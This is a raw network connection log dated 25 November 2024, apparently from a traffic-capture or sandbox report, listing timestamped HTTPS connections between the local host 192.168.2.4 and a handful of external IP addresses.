                                                    Nov 25, 2024 19:44:19.456995010 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:19.473551035 CET49777443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:19.473639965 CET44349777104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:19.473834991 CET49777443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:19.473918915 CET49777443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:19.473943949 CET44349777104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:20.775127888 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:20.775401115 CET49776443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:20.775424957 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:20.775713921 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:20.776006937 CET49776443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:20.776066065 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:20.776166916 CET49776443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:20.776213884 CET49776443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:20.776257038 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:20.782676935 CET44349777104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:20.782984018 CET49777443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:20.783034086 CET44349777104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:20.784166098 CET44349777104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:20.784534931 CET49777443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:20.784626961 CET49777443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:20.784642935 CET44349777104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:20.784730911 CET44349777104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:20.837857008 CET49777443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:21.357501030 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.357583046 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.357604980 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.357631922 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.357642889 CET49776443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.357656002 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.357686996 CET49776443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.357693911 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.357738972 CET49776443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.358921051 CET49776443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.358931065 CET44349776172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.363922119 CET49778443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.363940001 CET44349778172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.364011049 CET49778443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.364518881 CET49778443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.364530087 CET44349778172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.406359911 CET44349777104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:21.406543016 CET44349777104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:21.406610966 CET49777443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:21.549316883 CET49777443192.168.2.4104.18.95.41
                                                    Nov 25, 2024 19:44:21.549355984 CET44349777104.18.95.41192.168.2.4
                                                    Nov 25, 2024 19:44:21.581429005 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.581475973 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.581546068 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.584503889 CET49780443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.584542036 CET44349780172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.584611893 CET49780443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.586754084 CET49780443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.586770058 CET44349780172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:21.587044954 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:21.587059021 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.635143995 CET44349778172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.635442972 CET49778443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.635466099 CET44349778172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.636450052 CET44349778172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.636524916 CET49778443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.636889935 CET49778443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.636902094 CET49778443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.636950016 CET44349778172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.636959076 CET49778443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.637008905 CET49778443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.637278080 CET49781443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.637309074 CET44349781172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.637376070 CET49781443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.637581110 CET49781443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.637593031 CET44349781172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.808068991 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.808525085 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.808545113 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.809005976 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.809334040 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.809411049 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.809545040 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.809613943 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.809647083 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.899000883 CET44349780172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.899213076 CET49780443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.899244070 CET44349780172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.900358915 CET44349780172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.900722027 CET49780443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:22.900913000 CET44349780172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:22.953412056 CET49780443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:23.288687944 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:23.288927078 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:23.288995981 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:23.289007902 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:23.289036036 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:23.289088964 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:23.289124012 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:23.290810108 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:23.290878057 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:23.290889025 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:23.291085958 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:23.291143894 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:23.324243069 CET49779443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:23.324259996 CET44349779172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:23.732176065 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:23.732207060 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:23.732300043 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:23.732503891 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:23.732520103 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:23.951133013 CET44349781172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:24.006248951 CET49781443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:24.094402075 CET49781443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:24.094413996 CET44349781172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:24.094825983 CET44349781172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:24.100220919 CET49781443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:24.100281954 CET44349781172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:24.100400925 CET49781443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:24.147339106 CET44349781172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:24.447751045 CET44349781172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:24.447808981 CET44349781172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:24.449199915 CET49781443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:24.449520111 CET49781443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:24.449537992 CET44349781172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:25.083915949 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.084211111 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.084233999 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.085876942 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.085947037 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.086918116 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.087003946 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.087110996 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.087119102 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.133523941 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.549844980 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.549916029 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.549976110 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.549998999 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.550069094 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.550127983 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.550415039 CET49782443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.550426960 CET4434978269.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.572670937 CET49780443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:25.619340897 CET44349780172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:25.709351063 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:25.709391117 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:25.709460020 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:25.709618092 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.709625959 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.709678888 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.709897041 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:25.709908962 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:25.710081100 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:25.710091114 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:25.918844938 CET44349780172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:25.918940067 CET44349780172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:25.918989897 CET49780443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:25.919540882 CET49780443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:25.919557095 CET44349780172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:25.921077967 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:25.921097994 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:25.921153069 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:25.921375990 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:25.921390057 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:26.993875980 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:26.994136095 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:26.994153023 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:26.995022058 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:26.995074034 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:26.996404886 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:26.996459007 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:26.996619940 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.039372921 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.041436911 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.041445017 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.070744038 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:27.070934057 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:27.070943117 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:27.074472904 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:27.074538946 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:27.074803114 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:27.074903965 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:27.075017929 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:27.088673115 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.120086908 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:27.120094061 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:27.167220116 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:27.192253113 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.192553043 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.192569971 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.193032980 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.193327904 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.193411112 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.193440914 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.239332914 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.245031118 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.456880093 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.456923008 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.456943035 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.456960917 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.456990004 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.456994057 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.457011938 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.457032919 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.457056046 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.457060099 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.468302011 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.468379021 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.468385935 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.476850033 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.476898909 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.476906061 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.529155016 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.555816889 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:27.555869102 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:27.555919886 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:27.555927992 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:27.556020975 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:27.556071043 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:27.556478024 CET49784443192.168.2.469.49.245.172
                                                    Nov 25, 2024 19:44:27.556489944 CET4434978469.49.245.172192.168.2.4
                                                    Nov 25, 2024 19:44:27.579993010 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.623285055 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.623291016 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.660057068 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.660171032 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.660235882 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.660257101 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.660339117 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.660387039 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.660396099 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.661809921 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.661864042 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.661870956 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.668561935 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.668625116 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.668629885 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.668752909 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.668802977 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.668811083 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.668966055 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.669018030 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.669305086 CET49785443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.669316053 CET44349785172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.674958944 CET49786443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.674988985 CET44349786172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.675060034 CET49786443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.675673008 CET49786443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.675687075 CET44349786172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.676789999 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.676855087 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.676861048 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.685034990 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.685095072 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.685102940 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.693572998 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.693649054 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.693655014 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.701746941 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.701818943 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.701824903 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.718157053 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.718241930 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.718247890 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.725327015 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.725398064 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.725403070 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.732528925 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.732597113 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.732601881 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.738996983 CET49787443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.739016056 CET44349787172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.739068985 CET49787443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.739665031 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.739702940 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.739722013 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.739727974 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.739765882 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.739834070 CET49787443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:27.739845991 CET44349787172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:27.746802092 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.778012991 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.778093100 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.778114080 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.778271914 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.778320074 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.778400898 CET49783443192.168.2.4104.17.25.14
                                                    Nov 25, 2024 19:44:27.778410912 CET44349783104.17.25.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.938575983 CET49788443192.168.2.4104.17.24.14
                                                    Nov 25, 2024 19:44:27.938606977 CET44349788104.17.24.14192.168.2.4
                                                    Nov 25, 2024 19:44:27.938674927 CET49788443192.168.2.4104.17.24.14
                                                    Nov 25, 2024 19:44:27.938890934 CET49788443192.168.2.4104.17.24.14
                                                    Nov 25, 2024 19:44:27.938905954 CET44349788104.17.24.14192.168.2.4
                                                    Nov 25, 2024 19:44:28.236021996 CET49789443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:28.236061096 CET44349789104.21.63.27192.168.2.4
                                                    Nov 25, 2024 19:44:28.236124992 CET49789443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:28.236407042 CET49789443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:28.236419916 CET44349789104.21.63.27192.168.2.4
                                                    Nov 25, 2024 19:44:28.236766100 CET49790443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:28.236778975 CET44349790104.21.63.27192.168.2.4
                                                    Nov 25, 2024 19:44:28.236833096 CET49790443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:28.237107038 CET49790443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:28.237118959 CET44349790104.21.63.27192.168.2.4
                                                    Nov 25, 2024 19:44:28.916321993 CET44349786172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:28.916591883 CET49786443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:28.916606903 CET44349786172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:28.919718981 CET44349786172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:28.919778109 CET49786443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:28.920268059 CET49786443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:28.920279026 CET49786443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:28.920335054 CET49786443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:28.920351028 CET44349786172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:28.920403957 CET49786443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:28.920835972 CET49791443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:28.920919895 CET44349791172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:28.920979977 CET49791443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:28.921233892 CET49791443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:28.921267033 CET44349791172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:29.089817047 CET44349787172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:29.090262890 CET49787443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:29.090277910 CET44349787172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:29.091377020 CET44349787172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:29.091677904 CET49787443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:29.091849089 CET44349787172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:29.136189938 CET49787443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:29.160351992 CET44349788104.17.24.14192.168.2.4
                                                    Nov 25, 2024 19:44:29.160594940 CET49788443192.168.2.4104.17.24.14
                                                    Nov 25, 2024 19:44:29.160608053 CET44349788104.17.24.14192.168.2.4
                                                    Nov 25, 2024 19:44:29.162045002 CET44349788104.17.24.14192.168.2.4
                                                    Nov 25, 2024 19:44:29.162103891 CET49788443192.168.2.4104.17.24.14
                                                    Nov 25, 2024 19:44:29.162513018 CET49788443192.168.2.4104.17.24.14
                                                    Nov 25, 2024 19:44:29.162594080 CET44349788104.17.24.14192.168.2.4
                                                    Nov 25, 2024 19:44:29.162733078 CET49788443192.168.2.4104.17.24.14
                                                    Nov 25, 2024 19:44:29.162741899 CET44349788104.17.24.14192.168.2.4
                                                    Nov 25, 2024 19:44:29.216547966 CET49788443192.168.2.4104.17.24.14
                                                    Nov 25, 2024 19:44:29.496428013 CET44349790104.21.63.27192.168.2.4
                                                    Nov 25, 2024 19:44:29.496747017 CET49790443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:29.496764898 CET44349790104.21.63.27192.168.2.4
                                                    Nov 25, 2024 19:44:29.497632027 CET44349790104.21.63.27192.168.2.4
                                                    Nov 25, 2024 19:44:29.497694016 CET49790443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:29.498003006 CET49790443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:29.498013973 CET49790443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:29.498064041 CET44349790104.21.63.27192.168.2.4
                                                    Nov 25, 2024 19:44:29.498073101 CET49790443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:29.498120070 CET49790443192.168.2.4104.21.63.27
                                                    Nov 25, 2024 19:44:29.498446941 CET49792443192.168.2.4104.21.63.27
